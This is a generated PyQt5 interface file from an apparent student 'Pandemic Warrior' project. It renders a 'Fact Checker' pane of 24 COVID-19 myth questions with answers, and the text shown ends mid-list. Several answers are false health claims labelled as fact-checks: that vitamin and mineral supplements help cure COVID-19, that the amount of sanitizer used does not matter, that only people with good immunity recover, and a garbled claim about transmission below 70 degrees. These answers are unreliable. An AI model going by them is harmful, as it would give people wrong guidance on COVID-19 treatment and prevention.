Pandemic Warrior/main/Fact_Checker_gui.py
|
varunkm192002/Pandemic-Warrior
|
04481b74ebacb0086733a2084bbdf6dbb15c1d1f
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Akshita_02.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(970, 540)
Form.setStyleSheet("")
self.verticalLayout = QtWidgets.QVBoxLayout(Form)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName("verticalLayout")
self.frame = QtWidgets.QFrame(Form)
self.frame.setStyleSheet("QFrame{\n"
" \n"
"background:#333;\n"
"\n"
"\n"
" border:2px;\n"
" border-radius:30px;\n"
" \n"
"}\n"
"\n"
"/* VERTICAL SCROLLBAR */\n"
" QScrollBar:vertical {\n"
" border: none; \n"
" background-color: rgb(61, 56, 70);\n"
" width: 14px;\n"
" margin: 15px 0 15px 0;\n"
" border-radius: 0px;\n"
" }\n"
"\n"
"/* HANDLE BAR VERTICAL */\n"
"QScrollBar::handle:vertical { \n"
" background-color: rgb(190, 190, 190);\n"
" min-height: 30px;\n"
" border-radius: 7px;\n"
"}\n"
"QScrollBar::handle:vertical:hover{ \n"
" \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"QScrollBar::handle:vertical:pressed { \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"\n"
"/* BTN TOP - SCROLLBAR */\n"
"QScrollBar::sub-line:vertical {\n"
" border: none;\n"
" background-color: rgb(200, 200, 200);\n"
" height: 15px;\n"
" border-top-left-radius: 7px;\n"
" border-top-right-radius: 7px;\n"
" subcontrol-position: top;\n"
" subcontrol-origin: margin;\n"
"}\n"
"QScrollBar::sub-line:vertical:hover { \n"
" background-color: rgb(255, 0, 127);\n"
"}\n"
"QScrollBar::sub-line:vertical:pressed { \n"
" background-color: rgb(185, 0, 92);\n"
"}\n"
"\n"
"/* BTN BOTTOM - SCROLLBAR */\n"
"QScrollBar::add-line:vertical {\n"
" border: none;\n"
" background-color: rgb(200, 200, 200);\n"
" height: 15px;\n"
" border-bottom-left-radius: 7px;\n"
" border-bottom-right-radius: 7px;\n"
" subcontrol-position: bottom;\n"
" subcontrol-origin: margin;\n"
"}\n"
"QScrollBar::add-line:vertical:hover { \n"
" background-color: rgb(255, 0, 127);\n"
"}\n"
"QScrollBar::add-line:vertical:pressed { \n"
" background-color: rgb(185, 0, 92);\n"
"}\n"
"\n"
"/* RESET ARROW */\n"
"QScrollBar::up-arrow:vertical, QScrollBar::down-arrow:vertical {\n"
" background: none;\n"
"}\n"
"QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {\n"
" background: none;\n"
"}\n"
"\n"
"/* HORIZONTAL SCROLLBAR */\n"
" QScrollBar:horizontal {\n"
" border: none; \n"
" background-color: rgb(61, 56, 70);\n"
" height: 14px;\n"
" margin: 0px 15px 0px 15px;\n"
" border-radius: 0px;\n"
" }\n"
"\n"
"/* HANDLE BAR HORIZONTAL */\n"
"QScrollBar::handle:horizontal { \n"
" background-color: rgb(190, 190, 190);\n"
" min-width: 30px;\n"
" border-radius: 7px;\n"
"}\n"
"QScrollBar::handle:horizontal:hover{ \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"QScrollBar::handle:horizontal:pressed { \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"\n"
"/* BTN TOP - SCROLLBAR */\n"
"QScrollBar::sub-line:horizontal {\n"
" border: none;\n"
" background-color: rgb(200, 200, 200);\n"
" width: 15px;\n"
" border-top-left-radius: 7px;\n"
" border-top-right-radius: 7px;\n"
" subcontrol-position: left;\n"
" subcontrol-origin: margin;\n"
"}\n"
"QScrollBar::sub-line:horizontal:hover { \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"QScrollBar::sub-line:horizontal:pressed { \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"\n"
"/* BTN BOTTOM - SCROLLBAR */\n"
"QScrollBar::add-line:horizontal{\n"
" border: none;\n"
" background-color: rgb(200, 200, 200);\n"
" width: 15px;\n"
" border-bottom-left-radius: 7px;\n"
" border-bottom-right-radius: 7px;\n"
" subcontrol-position: right;\n"
" subcontrol-origin: margin;\n"
"}\n"
"QScrollBar::add-line:horizontal:hover { \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"QScrollBar::add-line:horizontal:pressed { \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"\n"
"/* RESET ARROW */\n"
"QScrollBar::up-arrow:horizontal, QScrollBar::down-arrow:horizontal {\n"
" background: none;\n"
"}\n"
"QScrollBar::add-page:horizontal, QScrollBar::sub-page:horizontal {\n"
" background: none;\n"
"}\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"")
self.frame.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame.setFrameShadow(QtWidgets.QFrame.Plain)
self.frame.setLineWidth(0)
self.frame.setMidLineWidth(0)
self.frame.setObjectName("frame")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setContentsMargins(1, 3, 5, -1)
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.btn_minimize_3 = QtWidgets.QPushButton(self.frame)
self.btn_minimize_3.setMinimumSize(QtCore.QSize(16, 16))
self.btn_minimize_3.setMaximumSize(QtCore.QSize(17, 17))
self.btn_minimize_3.setStyleSheet("QPushButton {\n"
" border: none;\n"
" border-radius: 8px; \n"
" background-color: rgb(255, 170, 0);\n"
"}\n"
"QPushButton:hover { \n"
" background-color: rgba(255, 170, 0, 150);\n"
"}")
self.btn_minimize_3.setText("")
self.btn_minimize_3.setObjectName("btn_minimize_3")
self.horizontalLayout.addWidget(self.btn_minimize_3)
self.btn_close_3 = QtWidgets.QPushButton(self.frame)
self.btn_close_3.setMinimumSize(QtCore.QSize(16, 16))
self.btn_close_3.setMaximumSize(QtCore.QSize(17, 17))
self.btn_close_3.setStyleSheet("QPushButton {\n"
" border: none;\n"
" border-radius: 8px; \n"
" background-color: rgb(255, 0, 0);\n"
"}\n"
"QPushButton:hover { \n"
" background-color: rgba(255, 0, 0, 150);\n"
"}")
self.btn_close_3.setText("")
self.btn_close_3.setObjectName("btn_close_3")
self.horizontalLayout.addWidget(self.btn_close_3)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.frame_2 = QtWidgets.QFrame(self.frame)
self.frame_2.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_2.setObjectName("frame_2")
self.gridLayout = QtWidgets.QGridLayout(self.frame_2)
self.gridLayout.setContentsMargins(11, 9, 8, -1)
self.gridLayout.setSpacing(6)
self.gridLayout.setObjectName("gridLayout")
self.textEdit = QtWidgets.QTextEdit(self.frame_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.textEdit.sizePolicy().hasHeightForWidth())
self.textEdit.setSizePolicy(sizePolicy)
self.textEdit.setMinimumSize(QtCore.QSize(938, 480))
font = QtGui.QFont()
font.setFamily("URW Bookman [urw]")
self.textEdit.setFont(font)
self.textEdit.setStyleSheet("")
self.textEdit.setFrameShape(QtWidgets.QFrame.NoFrame)
self.textEdit.setFrameShadow(QtWidgets.QFrame.Raised)
self.textEdit.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAsNeeded)
self.textEdit.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAsNeeded)
self.textEdit.setLineWrapMode(QtWidgets.QTextEdit.NoWrap)
self.textEdit.setObjectName("textEdit")
self.gridLayout.addWidget(self.textEdit, 0, 0, 1, 1)
self.verticalLayout_2.addWidget(self.frame_2)
self.verticalLayout.addWidget(self.frame)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.btn_minimize_3.setToolTip(_translate("Form", "Minimize"))
self.btn_close_3.setToolTip(_translate("Form", "Close"))
self.textEdit.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'URW Bookman [urw]\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:26pt; font-weight:600; font-style:italic; color:#ffffff;\">Fact Checker</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">1. Will most people who get COVID-19 get very sick or die?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes most of the people got sick but it is not necessary they will die.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">2. Can you always tell if someone has COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No, many times there can be asymptomatic disease.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">3. Does COVID-19 only affect rich people?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->False.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">4. Does COVID-19 only affect poor people?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->False.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">5. Does COVID-19 only affect old people, meaning young people don’t have to worry?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No, the latest strains of virus affect all age groups.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">6. Are people living with HIV more likely to get seriously ill?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">--> Yes, because HIV directly affects your immune system.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">7. Are the COVID-19 vaccines safe?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes, they are safe.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">8. Are the drugs used in antiretroviral treatment for HIV effective against COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">9. Are anti-malaria drugs effective against COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">10. Can COVID-19 be passed on in warm sunny weather?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">--> Yes, it can pass at temp below 70 degrees.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">11. Can hot drinks stop COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->The Centre stated the fact that it does not kill the virus nor does it cure the disease. It added that a temperature of 60-75 degrees is required in lab settings to kill the coronavirus.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">12. Does COVID-19 only happens due to cold drinks?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->There is no conection between cold drinks and covid at all.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">13. Should I use a strong disinfectant to clean my hands and body to protect myself from COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes, one can use strong disinfectants but in proportion.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">14. Can drinking alcohol cure or prevent COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Drinking alcohol is dangerous to health and doesn\'t cure covid.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">15. Is It safer to frequently clean your hands and not wear gloves?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->You should clear your hands frequently and also wear gloves.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">16. Does Touching a communal bottle of alcohol-based sanitizer will not infect you?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes, there is a possiblity of infection.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">17. Does The amount of alcohol-based sanitizer you use matters?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No, the amount of alcohol is as per guildlines in sanitizers.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">18. Does Clinical trials confirm that hydroxychloroquine does not prevent illness or death from COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes , it doesn\'t prevent. it is more effective for malaria.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">19. Can Vitamin and mineral supplements cure COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes, they help in curing covid. But should be taken with doctor\'s advice.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">20. Is dexamethasone a treatment for all COVID-19 patients?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->It is only used for critically ill people.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">21. Should People NOT wear masks while exercising?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->We should always wear mask even if we are doing any job.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">22. Does Water or swimming not transmit the COVID-19 virus?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->The COVID-19 virus does not transmit through water while swimming. However, the virus spreads between people when someone has close contact with an infected person.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">23. Is The likelihood of shoes spreading COVID-19 is veryLow?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Shoes don\'t spread covid as they won\'t come in contact with others.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">24. Do Most people who get COVID-19 recover from it?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Only the people having good immunity are recovered.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
